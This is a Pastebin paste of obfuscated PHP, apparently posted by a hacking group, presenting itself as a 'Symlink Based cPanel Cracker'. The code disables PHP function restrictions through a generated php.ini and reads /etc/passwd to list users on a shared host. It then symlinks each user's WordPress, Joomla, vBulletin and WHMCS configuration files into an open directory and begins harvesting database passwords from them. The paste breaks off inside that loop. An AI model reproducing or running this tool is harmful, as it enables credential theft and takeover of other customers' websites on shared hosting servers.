API tools faq
paste
Advertisement
Guest User

Anon Ghost

a guest
May 26th, 2017
163
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 37.68 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. $ {
  3. "GLOBALS"
  4. }
  5. ["urgtxxu"]="password";
  6. $ {
  7. "GLOBALS"
  8. }
  9. ["tmwmkkbdjy"]="data";
  10. $ {
  11. "GLOBALS"
  12. }
  13. ["trhahkqrevw"]="connect_timeout";
  14. $ {
  15. "GLOBALS"
  16. }
  17. ["onsdfdthx"]="finalpass";
  18. $ {
  19. "GLOBALS"
  20. }
  21. ["qkfpdhf"]="target";
  22. $ {
  23. "GLOBALS"
  24. }
  25. ["wqykbxlcrzw"]="finaluser";
  26. $ {
  27. "GLOBALS"
  28. }
  29. ["iasgvgve"]="passlist";
  30. $ {
  31. "GLOBALS"
  32. }
  33. ["afrrfxkgbv"]="userl";
  34. $ {
  35. "GLOBALS"
  36. }
  37. ["cywofo"]="userlist";
  38. $ {
  39. "GLOBALS"
  40. }
  41. ["ainkhzdg"]="timeout";
  42. $ {
  43. "GLOBALS"
  44. }
  45. ["cmlkxbh"]="cracked";
  46. $ {
  47. "GLOBALS"
  48. }
  49. ["jtxbycj"]="attack";
  50. $ {
  51. "GLOBALS"
  52. }
  53. ["avvdiennau"]="passl";
  54. $ {
  55. "GLOBALS"
  56. }
  57. ["pkxusn"]="rt";
  58. $ {
  59. "GLOBALS"
  60. }
  61. ["mpzmgvjrk"]="pf";
  62. $ {
  63. "GLOBALS"
  64. }
  65. ["frnguil"]="d";
  66. $ {
  67. "GLOBALS"
  68. }
  69. ["oqvsusmuih"]="users";
  70. $ {
  71. "GLOBALS"
  72. }
  73. ["nheadbdqjtu"]="db";
  74. $ {
  75. "GLOBALS"
  76. }
  77. ["jqbdqptiz"]="pass";
  78. $ {
  79. "GLOBALS"
  80. }
  81. ["dseeueq"]="dbp";
  82. $ {
  83. "GLOBALS"
  84. }
  85. ["smposrbewu"]="uxl";
  86. $ {
  87. "GLOBALS"
  88. }
  89. ["ytygxi"]="result";
  90. $ {
  91. "GLOBALS"
  92. }
  93. ["clcexgoc"]="ch";
  94. $ {
  95. "GLOBALS"
  96. }
  97. ["ghpkiod"]="co";
  98. $ {
  99. "GLOBALS"
  100. }
  101. ["tfufwtkggg"]="usersss";
  102. $ {
  103. "GLOBALS"
  104. }
  105. ["xqjsjx"]="ffile";
  106. $ {
  107. "GLOBALS"
  108. }
  109. ["pmtirjsjc"]="ar1";
  110. $ {
  111. "GLOBALS"
  112. }
  113. ["kerydmcjzyb"]="ar";
  114. $ {
  115. "GLOBALS"
  116. }
  117. ["jlqnbkqdiu"]="marqueurFinLien";
  118. $ {
  119. "GLOBALS"
  120. }
  121. ["ggmdrvtscl"]="ar0";
  122. $ {
  123. "GLOBALS"
  124. }
  125. ["cphxtevrvxlx"]="uss";
  126. $ {
  127. "GLOBALS"
  128. }
  129. ["nfkxmppan"]="us";
  130. $ {
  131. "GLOBALS"
  132. }
  133. ["fdrsjdqvvfa"]="usr";
  134. $ {
  135. "GLOBALS"
  136. }
  137. ["wwtfekdukc"]="f";
  138. $ {
  139. "GLOBALS"
  140. }
  141. ["mppsifb"]="user";
  142. $ {
  143. "GLOBALS"
  144. }
  145. ["tnsglnuwozs"]="str";
  146. $ {
  147. "GLOBALS"
  148. }
  149. ["estpmxtrsymy"]="link";
  150. $ {
  151. "GLOBALS"
  152. }
  153. ["ukikdh"]="r";
  154. $pfsmvyqq="head";
  155. $ {
  156. "GLOBALS"
  157. }
  158. ["puhmppjk"]="head";
  159. $ {
  160. $ {
  161. "GLOBALS"
  162. }
  163. ["puhmppjk"]
  164. }
  165. ="
  166. <html>
  167. <head>
  168. </script>
  169. <title>--==[[Symlink Based Cpanel Cracker By Team AnonGhost Team]]==--</title>
  170. <link rel=\"shortcut icon\" href=\"http://i.imgur.com/g7VNhrD.gif\" />
  171. <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">
  172. <STYLE>
  173. body {
  174. font-family: Tahoma
  175. }
  176. tr {
  177. BORDER: dashed 1px #333;
  178. color: #FFF;
  179. }
  180. td {
  181. BORDER: dashed 1px #333;
  182. color: #FFF;
  183. }
  184. .table1 {
  185. BORDER: 0px Black;
  186. BACKGROUND-COLOR: Black;
  187. color: #FFF;
  188. }
  189. .td1 {
  190. BORDER: 0px;
  191. BORDER-COLOR: #333333;
  192. font: 7pt Verdana;
  193. color: Green;
  194. }
  195. .tr1 {
  196. BORDER: 0px;
  197. BORDER-COLOR: #333333;
  198. color: #FFF;
  199. }
  200. table {
  201. BORDER: dashed 1px #333;
  202. BORDER-COLOR: #333333;
  203. BACKGROUND-COLOR: Black;
  204. color: #FFF;
  205. }
  206. input {
  207. border : solid 3px ;
  208. border-color : #333;
  209. BACKGROUND-COLOR: white;
  210. font: 11pt Verdana;
  211. color: #333;
  212. }
  213. select {
  214. BORDER-RIGHT: Black 1px solid;
  215. BORDER-TOP: #DF0000 1px solid;
  216. BORDER-LEFT: #DF0000 1px solid;
  217. BORDER-BOTTOM: Black 1px solid;
  218. BORDER-color: #FFF;
  219. BACKGROUND-COLOR: Black;
  220. font: 8pt Verdana;
  221. color: Red;
  222. }
  223. submit {
  224. BORDER: buttonhighlight 2px outset;
  225. BACKGROUND-COLOR: Black;
  226. width: 30%;
  227. color: #FFF;
  228. }
  229. textarea {
  230. border : dashed 1px #333;
  231. BACKGROUND-COLOR: Black;
  232. font: Fixedsys bold;
  233. color: #999;
  234. }
  235. BODY {
  236. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  237. margin: 1px;
  238. color: Red;
  239. background-color: Black;
  240. }
  241. .main {
  242. margin : -287px 0px 0px -490px;
  243. BORDER: dashed 1px #333;
  244. BORDER-COLOR: #333333;
  245. }
  246. .tt {
  247. background-color: Black;
  248. }
  249. A:link {
  250. COLOR: White; TEXT-DECORATION: none
  251. }
  252. A:visited {
  253. COLOR: White; TEXT-DECORATION: none
  254. }
  255. A:hover {
  256. color: Red; TEXT-DECORATION: none
  257. }
  258. A:active {
  259. color: Red; TEXT-DECORATION: none
  260. }
  261. </STYLE>
  262. <script language='javascript'>
  263. function hide_div(id)
  264. {
  265. document.getElementById(id).style.display = 'none';
  266. document.cookie=id+'=0;';
  267. }
  268. function show_div(id)
  269. {
  270. document.getElementById(id).style.display = 'block';
  271. document.cookie=id+'=1;';
  272. }
  273. function change_divst(id)
  274. {
  275. if (document.getElementById(id).style.display == 'none')
  276. show_div(id);
  277. else
  278. hide_div(id);
  279. }
  280. </script>";
  281. echo "<html>
  282. <head>
  283. ";
  284. echo$ {
  285. $pfsmvyqq
  286. }
  287. ;
  288. echo"
  289. <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" class=\"tb1\" >
  290. <td width=\"100%\" align=center valign=\"top\" rowspan=\"1\">
  291. <font color=\"#00FFFF\" size=5 face=\"comic sans ms\"><b>--==[[ Symlink Based</font><font color=\"#00FFFF\" size=5 face=\"comic sans ms\"><b> cPanel Cracker By</font><font color=\"#00FFFF\" size=5 face=\"comic sans ms\"><b> AnonGhost Team ]]==--</font> <div class=\"hedr\">
  292. <td height=\"10\" align=\"left\" class=\"td1\"></td></tr><tr><td
  293. width=\"100%\" align=\"center\" valign=\"top\" rowspan=\"1\"><font
  294. color=\"red\" face=\"comic sans ms\"size=\"1\"><b>
  295. <font color=#ff0000>
  296. ####################################################</font><font color=#ff0>#####################################################</font><font color=#00ff00>####################################################</font><br><img src=\"http://sphotos-f.ak.fbcdn.net/hphotos-ak-ash3/521783_103710146495379_821757957_n.jpg\"/><br><font color=red>
  297. ####################################################</font><font color=yellow>#####################################################</font><font color=lime>####################################################</font>
  298. </table>
  299. </table>
  300. <table width=\"100%\" border=\"2\">
  301. <tr>
  302. <td width=\"10%\" align=\"center\">
  303. <blink><font color=\"red\"><code>Greetz To : </code></font></blink>
  304. </td>
  305. <td width=\"90%\">
  306. <font color=\"lime\">
  307. <marquee><code>Cutira Rahayu (Mygirlfriend) | AnonGhost | INDISHELL | ZHC | Mauritania Hacker Team | Algerian To The Core | GCE College ke DON | Local Root INDISHELL | DON3 | All Member AnonGhost | All Member INDISHELL | All Member Algerian To The Core</code></marquee>
  308. </font>
  309. </td>
  310. </tr>
  311. </table>
  312. <br></font></div><div align=center><table width=50%><font color=\"#FF0000\" font size=5>r3c0d3d by : <a href=\"http://www.facebook.com/K4C3.undetected2\"/><font color=\"#00ff00\" font size=5>K4C3 Undetected<a/></font></table>
  313. ";
  314. echo "<body bgcolor=black><h3 style=\"text-align:center\"><font color=red size=2 face=\"comic sans ms\">
  315. <form method=post>
  316. <input type=submit name=ini value=\"Generate PHP.ini\" /></form>
  317. ";
  318. if(isset($_POST["ini"])) {
  319. $tuyukblaw="rr";
  320. $ {
  321. "GLOBALS"
  322. }
  323. ["vpmwuoumuy"]="rr";
  324. $zcbtdlw="r";
  325. $ {
  326. $zcbtdlw
  327. }
  328. =fopen("php.ini","w");
  329. $ {
  330. "GLOBALS"
  331. }
  332. ["bkdfntbucf"]="link";
  333. $ {
  334. $tuyukblaw
  335. }
  336. =" disable_functions=none ";
  337. fwrite($ {
  338. $ {
  339. "GLOBALS"
  340. }
  341. ["ukikdh"]
  342. }
  343. ,$ {
  344. $ {
  345. "GLOBALS"
  346. }
  347. ["vpmwuoumuy"]
  348. }
  349. );
  350. $ {
  351. $ {
  352. "GLOBALS"
  353. }
  354. ["bkdfntbucf"]
  355. }
  356. ="<a href=php.ini><font color=white size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
  357. echo$ {
  358. $ {
  359. "GLOBALS"
  360. }
  361. ["estpmxtrsymy"]
  362. }
  363. ;
  364. }
  365. $ {
  366. "GLOBALS"
  367. }
  368. ["fhuebeob"]="userl";
  369. echo "<p>\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Symlink based cpanel cracking ///////////////////////
  370. ";
  371. echo "<form method=post>
  372. <input type=submit name=\"usre\" value=\"click to Extract usernames and mass symlink\" /></form>
  373. ";
  374. if(isset($_POST["usre"])) {
  375. $ {
  376. "GLOBALS"
  377. }
  378. ["nmgxpcpfqbz"]="users";
  379. $ {
  380. "GLOBALS"
  381. }
  382. ["ooteonyawj"]="users";
  383. $ulpomnmkws="user";
  384. echo "<form method=post>
  385. <textarea rows=10 cols=30 name=user>";
  386. $ {
  387. $ {
  388. "GLOBALS"
  389. }
  390. ["ooteonyawj"]
  391. }
  392. =file("/etc/passwd");
  393. foreach($ {
  394. $ {
  395. "GLOBALS"
  396. }
  397. ["nmgxpcpfqbz"]
  398. }
  399. as$ {
  400. $ulpomnmkws
  401. }
  402. ) {
  403. $ {
  404. $ {
  405. "GLOBALS"
  406. }
  407. ["tnsglnuwozs"]
  408. }
  409. =explode(":",$ {
  410. $ {
  411. "GLOBALS"
  412. }
  413. ["mppsifb"]
  414. }
  415. );
  416. $ {
  417. "GLOBALS"
  418. }
  419. ["withojrurut"]="str";
  420. echo$ {
  421. $ {
  422. "GLOBALS"
  423. }
  424. ["withojrurut"]
  425. }
  426. [0]."
  427. ";
  428. }
  429. echo "</textarea><br><br>
  430. <input type=submit name=su value=\"Kill Them\" /></form>
  431. ";
  432. }
  433. error_reporting(0);
  434. echo"<font color=red size=2 face=\"comic sans ms\">";
  435. if(isset($_POST["su"])) {
  436. $tpllhfwoe="r";
  437. $ {
  438. "GLOBALS"
  439. }
  440. ["lyvnzejugsvu"]="uss";
  441. $tcorpxovnr="dir";
  442. $ {
  443. "GLOBALS"
  444. }
  445. ["kveejcvk"]="f";
  446. $ {
  447. "GLOBALS"
  448. }
  449. ["rueiegknmuns"]="consym";
  450. $ {
  451. $tcorpxovnr
  452. }
  453. =mkdir("kace",0777);
  454. $ {
  455. $tpllhfwoe
  456. }
  457. =" Options all
  458. DirectoryIndex kace.html
  459. Require None
  460. Satisfy Any";
  461. $ {
  462. $ {
  463. "GLOBALS"
  464. }
  465. ["wwtfekdukc"]
  466. }
  467. =fopen("kace/.htaccess","w");
  468. fwrite($ {
  469. $ {
  470. "GLOBALS"
  471. }
  472. ["kveejcvk"]
  473. }
  474. ,$ {
  475. $ {
  476. "GLOBALS"
  477. }
  478. ["ukikdh"]
  479. }
  480. );
  481. $ {
  482. $ {
  483. "GLOBALS"
  484. }
  485. ["rueiegknmuns"]
  486. }
  487. ="<a href=kace/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
  488. echo"<br>folder where config files has been symlinked<br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
  489. $ {
  490. $ {
  491. "GLOBALS"
  492. }
  493. ["fdrsjdqvvfa"]
  494. }
  495. =explode("
  496. ",$_POST["user"]);
  497. foreach($ {
  498. $ {
  499. "GLOBALS"
  500. }
  501. ["fdrsjdqvvfa"]
  502. }
  503. as$ {
  504. $ {
  505. "GLOBALS"
  506. }
  507. ["lyvnzejugsvu"]
  508. }
  509. ) {
  510. $ {
  511. "GLOBALS"
  512. }
  513. ["ykxuxbudxwd"]="us";
  514. $nnfijewaq="us";
  515. $ {
  516. $ {
  517. "GLOBALS"
  518. }
  519. ["nfkxmppan"]
  520. }
  521. =trim($ {
  522. $ {
  523. "GLOBALS"
  524. }
  525. ["cphxtevrvxlx"]
  526. }
  527. );
  528. $ {
  529. "GLOBALS"
  530. }
  531. ["hqkbkbp"]="r";
  532. $ {
  533. "GLOBALS"
  534. }
  535. ["tjipdfjxt"]="us";
  536. $digicnsr="r";
  537. $ilinfsl="us";
  538. $nttomrctg="r";
  539. $wtsjldlfks="r";
  540. $ {
  541. $wtsjldlfks
  542. }
  543. ="kace/";
  544. $ {
  545. "GLOBALS"
  546. }
  547. ["siqthtb"]="us";
  548. $emvqckjm="us";
  549. symlink("/home/".$ {
  550. $ {
  551. "GLOBALS"
  552. }
  553. ["nfkxmppan"]
  554. }
  555. ."/public_html/wp-config.php",$ {
  556. $ {
  557. "GLOBALS"
  558. }
  559. ["ukikdh"]
  560. }
  561. .$ {
  562. $ {
  563. "GLOBALS"
  564. }
  565. ["nfkxmppan"]
  566. }
  567. ."..wp-config");
  568. $vbdqstdn="us";
  569. symlink("/home/".$ {
  570. $ {
  571. "GLOBALS"
  572. }
  573. ["nfkxmppan"]
  574. }
  575. ."/public_html/wordpress/wp-config.php",$ {
  576. $ {
  577. "GLOBALS"
  578. }
  579. ["ukikdh"]
  580. }
  581. .$ {
  582. $ {
  583. "GLOBALS"
  584. }
  585. ["nfkxmppan"]
  586. }
  587. ."..word-wp");
  588. $ {
  589. "GLOBALS"
  590. }
  591. ["oeqavelcrca"]="us";
  592. $ {
  593. "GLOBALS"
  594. }
  595. ["evgapi"]="r";
  596. $fuepnu="us";
  597. $ {
  598. "GLOBALS"
  599. }
  600. ["ciedzzvonvs"]="us";
  601. $ywjdhaoepls="r";
  602. $ {
  603. "GLOBALS"
  604. }
  605. ["seuqbf"]="us";
  606. $ {
  607. "GLOBALS"
  608. }
  609. ["icatsvxz"]="us";
  610. $jgueznl="r";
  611. $bxhsmqekesfp="us";
  612. $osqubeuk="us";
  613. $yhskzomzcmj="us";
  614. $ {
  615. "GLOBALS"
  616. }
  617. ["iqlxhlploe"]="r";
  618. $qshqeltig="us";
  619. symlink("/home/".$ {
  620. $ {
  621. "GLOBALS"
  622. }
  623. ["seuqbf"]
  624. }
  625. ."/public_html/blog/wp-config.php",$ {
  626. $ {
  627. "GLOBALS"
  628. }
  629. ["ukikdh"]
  630. }
  631. .$ {
  632. $ {
  633. "GLOBALS"
  634. }
  635. ["nfkxmppan"]
  636. }
  637. ."..wpblog");
  638. $ynyawmsbu="r";
  639. $upygzgud="r";
  640. symlink("/home/".$ {
  641. $vbdqstdn
  642. }
  643. ."/public_html/configuration.php",$ {
  644. $ {
  645. "GLOBALS"
  646. }
  647. ["iqlxhlploe"]
  648. }
  649. .$ {
  650. $ {
  651. "GLOBALS"
  652. }
  653. ["nfkxmppan"]
  654. }
  655. ."..joomla-or-whmcs");
  656. symlink("/home/".$ {
  657. $ {
  658. "GLOBALS"
  659. }
  660. ["nfkxmppan"]
  661. }
  662. ."/public_html/joomla/configuration.php",$ {
  663. $ {
  664. "GLOBALS"
  665. }
  666. ["evgapi"]
  667. }
  668. .$ {
  669. $ {
  670. "GLOBALS"
  671. }
  672. ["siqthtb"]
  673. }
  674. ."..joomla");
  675. $xmytnoqtu="us";
  676. $ {
  677. "GLOBALS"
  678. }
  679. ["fphgbuds"]="us";
  680. $ {
  681. "GLOBALS"
  682. }
  683. ["psapxabo"]="us";
  684. $ {
  685. "GLOBALS"
  686. }
  687. ["fmwcjqjyryn"]="us";
  688. $ {
  689. "GLOBALS"
  690. }
  691. ["uhxnnsjox"]="us";
  692. $ {
  693. "GLOBALS"
  694. }
  695. ["vtrdskbnl"]="r";
  696. symlink("/home/".$ {
  697. $ {
  698. "GLOBALS"
  699. }
  700. ["nfkxmppan"]
  701. }
  702. ."/public_html/vb/includes/config.php",$ {
  703. $nttomrctg
  704. }
  705. .$ {
  706. $ {
  707. "GLOBALS"
  708. }
  709. ["nfkxmppan"]
  710. }
  711. ."..vbinc");
  712. symlink("/home/".$ {
  713. $ {
  714. "GLOBALS"
  715. }
  716. ["uhxnnsjox"]
  717. }
  718. ."/public_html/includes/config.php",$ {
  719. $ {
  720. "GLOBALS"
  721. }
  722. ["ukikdh"]
  723. }
  724. .$ {
  725. $ {
  726. "GLOBALS"
  727. }
  728. ["nfkxmppan"]
  729. }
  730. ."..vb");
  731. $ {
  732. "GLOBALS"
  733. }
  734. ["wnvbzxp"]="us";
  735. $ {
  736. "GLOBALS"
  737. }
  738. ["hqilsywq"]="r";
  739. symlink("/home/".$ {
  740. $ {
  741. "GLOBALS"
  742. }
  743. ["nfkxmppan"]
  744. }
  745. ."/public_html/conf_global.php",$ {
  746. $ {
  747. "GLOBALS"
  748. }
  749. ["ukikdh"]
  750. }
  751. .$ {
  752. $ {
  753. "GLOBALS"
  754. }
  755. ["nfkxmppan"]
  756. }
  757. ."..conf_global");
  758. symlink("/home/".$ {
  759. $qshqeltig
  760. }
  761. ."/public_html/inc/config.php",$ {
  762. $ {
  763. "GLOBALS"
  764. }
  765. ["ukikdh"]
  766. }
  767. .$ {
  768. $ {
  769. "GLOBALS"
  770. }
  771. ["tjipdfjxt"]
  772. }
  773. ."..inc");
  774. symlink("/home/".$ {
  775. $ {
  776. "GLOBALS"
  777. }
  778. ["fphgbuds"]
  779. }
  780. ."/public_html/config.php",$ {
  781. $ {
  782. "GLOBALS"
  783. }
  784. ["ukikdh"]
  785. }
  786. .$ {
  787. $xmytnoqtu
  788. }
  789. ."..config");
  790. symlink("/home/".$ {
  791. $ {
  792. "GLOBALS"
  793. }
  794. ["nfkxmppan"]
  795. }
  796. ."/public_html/Settings.php",$ {
  797. $ywjdhaoepls
  798. }
  799. .$ {
  800. $ {
  801. "GLOBALS"
  802. }
  803. ["nfkxmppan"]
  804. }
  805. ."..Settings");
  806. symlink("/home/".$ {
  807. $ {
  808. "GLOBALS"
  809. }
  810. ["oeqavelcrca"]
  811. }
  812. ."/public_html/sites/default/settings.php",$ {
  813. $digicnsr
  814. }
  815. .$ {
  816. $ {
  817. "GLOBALS"
  818. }
  819. ["wnvbzxp"]
  820. }
  821. ."..sites");
  822. symlink("/home/".$ {
  823. $ilinfsl
  824. }
  825. ."/public_html/whm/configuration.php",$ {
  826. $ {
  827. "GLOBALS"
  828. }
  829. ["ukikdh"]
  830. }
  831. .$ {
  832. $emvqckjm
  833. }
  834. ."..whm");
  835. $qqfekrji="us";
  836. $ {
  837. "GLOBALS"
  838. }
  839. ["twjpjgbpqc"]="r";
  840. $ {
  841. "GLOBALS"
  842. }
  843. ["sxqkxmmdzq"]="us";
  844. symlink("/home/".$ {
  845. $ {
  846. "GLOBALS"
  847. }
  848. ["nfkxmppan"]
  849. }
  850. ."/public_html/whmcs/configuration.php",$ {
  851. $ {
  852. "GLOBALS"
  853. }
  854. ["ukikdh"]
  855. }
  856. .$ {
  857. $osqubeuk
  858. }
  859. ."..whmcs");
  860. $cbuolpszvmwl="us";
  861. $ {
  862. "GLOBALS"
  863. }
  864. ["qgnhbmkjk"]="us";
  865. symlink("/home/".$ {
  866. $cbuolpszvmwl
  867. }
  868. ."/public_html/support/configuration.php",$ {
  869. $ {
  870. "GLOBALS"
  871. }
  872. ["ukikdh"]
  873. }
  874. .$ {
  875. $ {
  876. "GLOBALS"
  877. }
  878. ["nfkxmppan"]
  879. }
  880. ."..supporwhmcs");
  881. symlink("/home/".$ {
  882. $ {
  883. "GLOBALS"
  884. }
  885. ["sxqkxmmdzq"]
  886. }
  887. ."/public_html/whmc/WHM/configuration.php",$ {
  888. $ {
  889. "GLOBALS"
  890. }
  891. ["ukikdh"]
  892. }
  893. .$ {
  894. $ {
  895. "GLOBALS"
  896. }
  897. ["nfkxmppan"]
  898. }
  899. ."..WHM");
  900. symlink("/home/".$ {
  901. $ {
  902. "GLOBALS"
  903. }
  904. ["nfkxmppan"]
  905. }
  906. ."/public_html/whm/WHMCS/configuration.php",$ {
  907. $ {
  908. "GLOBALS"
  909. }
  910. ["twjpjgbpqc"]
  911. }
  912. .$ {
  913. $ {
  914. "GLOBALS"
  915. }
  916. ["fmwcjqjyryn"]
  917. }
  918. ."..whmc");
  919. symlink("/home/".$ {
  920. $fuepnu
  921. }
  922. ."/public_html/whm/whmcs/configuration.php",$ {
  923. $ {
  924. "GLOBALS"
  925. }
  926. ["vtrdskbnl"]
  927. }
  928. .$ {
  929. $ {
  930. "GLOBALS"
  931. }
  932. ["ciedzzvonvs"]
  933. }
  934. ."..WHMcs");
  935. symlink("/home/".$ {
  936. $ {
  937. "GLOBALS"
  938. }
  939. ["nfkxmppan"]
  940. }
  941. ."/public_html/support/configuration.php",$ {
  942. $jgueznl
  943. }
  944. .$ {
  945. $ {
  946. "GLOBALS"
  947. }
  948. ["nfkxmppan"]
  949. }
  950. ."..whmcsupp");
  951. symlink("/home/".$ {
  952. $qqfekrji
  953. }
  954. ."/public_html/clients/configuration.php",$ {
  955. $ {
  956. "GLOBALS"
  957. }
  958. ["ukikdh"]
  959. }
  960. .$ {
  961. $ {
  962. "GLOBALS"
  963. }
  964. ["nfkxmppan"]
  965. }
  966. ."..whmcs-cli");
  967. symlink("/home/".$ {
  968. $ {
  969. "GLOBALS"
  970. }
  971. ["ykxuxbudxwd"]
  972. }
  973. ."/public_html/client/configuration.php",$ {
  974. $ {
  975. "GLOBALS"
  976. }
  977. ["hqkbkbp"]
  978. }
  979. .$ {
  980. $ {
  981. "GLOBALS"
  982. }
  983. ["icatsvxz"]
  984. }
  985. ."..whmcs-cl");
  986. symlink("/home/".$ {
  987. $ {
  988. "GLOBALS"
  989. }
  990. ["nfkxmppan"]
  991. }
  992. ."/public_html/clientes/configuration.php",$ {
  993. $ynyawmsbu
  994. }
  995. .$ {
  996. $bxhsmqekesfp
  997. }
  998. ."..whmcs-CL");
  999. symlink("/home/".$ {
  1000. $ {
  1001. "GLOBALS"
  1002. }
  1003. ["psapxabo"]
  1004. }
  1005. ."/public_html/cliente/configuration.php",$ {
  1006. $ {
  1007. "GLOBALS"
  1008. }
  1009. ["ukikdh"]
  1010. }
  1011. .$ {
  1012. $ {
  1013. "GLOBALS"
  1014. }
  1015. ["nfkxmppan"]
  1016. }
  1017. ."..whmcs-Cl");
  1018. symlink("/home/".$ {
  1019. $nnfijewaq
  1020. }
  1021. ."/public_html/clientsupport/configuration.php",$ {
  1022. $ {
  1023. "GLOBALS"
  1024. }
  1025. ["hqilsywq"]
  1026. }
  1027. .$ {
  1028. $ {
  1029. "GLOBALS"
  1030. }
  1031. ["nfkxmppan"]
  1032. }
  1033. ."..whmcs-csup");
  1034. symlink("/home/".$ {
  1035. $yhskzomzcmj
  1036. }
  1037. ."/public_html/billing/configuration.php",$ {
  1038. $upygzgud
  1039. }
  1040. .$ {
  1041. $ {
  1042. "GLOBALS"
  1043. }
  1044. ["qgnhbmkjk"]
  1045. }
  1046. ."..whmcs-bill");
  1047. symlink("/home/".$ {
  1048. $ {
  1049. "GLOBALS"
  1050. }
  1051. ["nfkxmppan"]
  1052. }
  1053. ."/public_html/admin/config.php",$ {
  1054. $ {
  1055. "GLOBALS"
  1056. }
  1057. ["ukikdh"]
  1058. }
  1059. .$ {
  1060. $ {
  1061. "GLOBALS"
  1062. }
  1063. ["nfkxmppan"]
  1064. }
  1065. ."..admin-conf");
  1066. }
  1067. }
  1068. echo "
  1069. <form method=post>
  1070. <input type=submit name=sm value=\"start grabbing passwords from configuration files\"></form>
  1071. ";
  1072. $ {
  1073. "GLOBALS"
  1074. }
  1075. ["ytidfmauvywq"]="target";
  1076. error_reporting(0);
  1077. set_time_limit(0);
  1078. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien) {
  1079. $olntrvw="text";
  1080. $khrhbgxcul="ar";
  1081. $ {
  1082. "GLOBALS"
  1083. }
  1084. ["agilmrcy"]="ar1";
  1085. $ {
  1086. "GLOBALS"
  1087. }
  1088. ["dbdhjgpvvl"]="marqueurDebutLien";
  1089. $ {
  1090. $ {
  1091. "GLOBALS"
  1092. }
  1093. ["ggmdrvtscl"]
  1094. }
  1095. =explode($ {
  1096. $ {
  1097. "GLOBALS"
  1098. }
  1099. ["dbdhjgpvvl"]
  1100. }
  1101. ,$ {
  1102. $olntrvw
  1103. }
  1104. );
  1105. $ {
  1106. $ {
  1107. "GLOBALS"
  1108. }
  1109. ["agilmrcy"]
  1110. }
  1111. =explode($ {
  1112. $ {
  1113. "GLOBALS"
  1114. }
  1115. ["jlqnbkqdiu"]
  1116. }
  1117. ,$ {
  1118. $ {
  1119. "GLOBALS"
  1120. }
  1121. ["ggmdrvtscl"]
  1122. }
  1123. [1]);
  1124. $ {
  1125. $ {
  1126. "GLOBALS"
  1127. }
  1128. ["kerydmcjzyb"]
  1129. }
  1130. =trim($ {
  1131. $ {
  1132. "GLOBALS"
  1133. }
  1134. ["pmtirjsjc"]
  1135. }
  1136. [0]);
  1137. return$ {
  1138. $khrhbgxcul
  1139. }
  1140. ;
  1141. }
  1142. if(isset($_POST["sm"])) {
  1143. echo"U can see the the Passowrd in here :p";
  1144. $ {
  1145. "GLOBALS"
  1146. }
  1147. ["svhyqvbhq"]="r";
  1148. $ {
  1149. $ {
  1150. "GLOBALS"
  1151. }
  1152. ["xqjsjx"]
  1153. }
  1154. =fopen("r.txt","a+");
  1155. $ {
  1156. "GLOBALS"
  1157. }
  1158. ["nhifbiqs"]="user";
  1159. $ {
  1160. "GLOBALS"
  1161. }
  1162. ["ztuunpxyevyv"]="re";
  1163. $ {
  1164. $ {
  1165. "GLOBALS"
  1166. }
  1167. ["svhyqvbhq"]
  1168. }
  1169. ="http://".$_SERVER["SERVER_NAME"].dirname($_SERVER["SCRIPT_NAME"])."/kace/";
  1170. $nsznhpufgc="confi";
  1171. $ {
  1172. $ {
  1173. "GLOBALS"
  1174. }
  1175. ["ztuunpxyevyv"]
  1176. }
  1177. =$ {
  1178. $ {
  1179. "GLOBALS"
  1180. }
  1181. ["ukikdh"]
  1182. }
  1183. ;
  1184. $oqjgrkmwi="users";
  1185. $ {
  1186. "GLOBALS"
  1187. }
  1188. ["hrwgcxni"]="users";
  1189. $ {
  1190. $nsznhpufgc
  1191. }
  1192. =array("..wp-config","..word-wp","..wpblog","..config","..admin-conf","..vb","..joomla-or-whmcs","..joomla","..vbinc","..whm","..whmcs","..supporwhmcs","..WHM","..whmc","..WHMcs","..whmcsupp","..whmcs-cli","..whmcs-cl","..whmcs-CL","..whmcs-Cl","..whmcs-csup","..whmcs-bill");
  1193. $ {
  1194. $ {
  1195. "GLOBALS"
  1196. }
  1197. ["hrwgcxni"]
  1198. }
  1199. =file("/etc/passwd");
  1200. foreach($ {
  1201. $oqjgrkmwi
  1202. }
  1203. as$ {
  1204. $ {
  1205. "GLOBALS"
  1206. }
  1207. ["nhifbiqs"]
  1208. }
  1209. ) {
  1210. $ {
  1211. "GLOBALS"
  1212. }
  1213. ["lffiivehuw"]="str";
  1214. $ {
  1215. "GLOBALS"
  1216. }
  1217. ["fdwmnihfmm"]="str";
  1218. $qdscoy="confi";
  1219. $ {
  1220. "GLOBALS"
  1221. }
  1222. ["qdsgggmv"]="user";
  1223. $ {
  1224. $ {
  1225. "GLOBALS"
  1226. }
  1227. ["fdwmnihfmm"]
  1228. }
  1229. =explode(":",$ {
  1230. $ {
  1231. "GLOBALS"
  1232. }
  1233. ["qdsgggmv"]
  1234. }
  1235. );
  1236. $ {
  1237. $ {
  1238. "GLOBALS"
  1239. }
  1240. ["tfufwtkggg"]
  1241. }
  1242. =$ {
  1243. $ {
  1244. "GLOBALS"
  1245. }
  1246. ["lffiivehuw"]
  1247. }
  1248. [0];
  1249. foreach($ {
  1250. $qdscoy
  1251. }
  1252. as$ {
  1253. $ {
  1254. "GLOBALS"
  1255. }
  1256. ["ghpkiod"]
  1257. }
  1258. ) {
  1259. $lqovtogmdro="ch";
  1260. $pohpfdtmti="re";
  1261. $ {
  1262. "GLOBALS"
  1263. }
  1264. ["nchjukvvqit"]="ch";
  1265. $hehrkezdpk="uxl";
  1266. $ {
  1267. "GLOBALS"
  1268. }
  1269. ["pemxmrsh"]="uurl";
  1270. $ptrckqlsicw="uxl";
  1271. $wzhjhoquw="uel";
  1272. $nmkswatkkt="co";
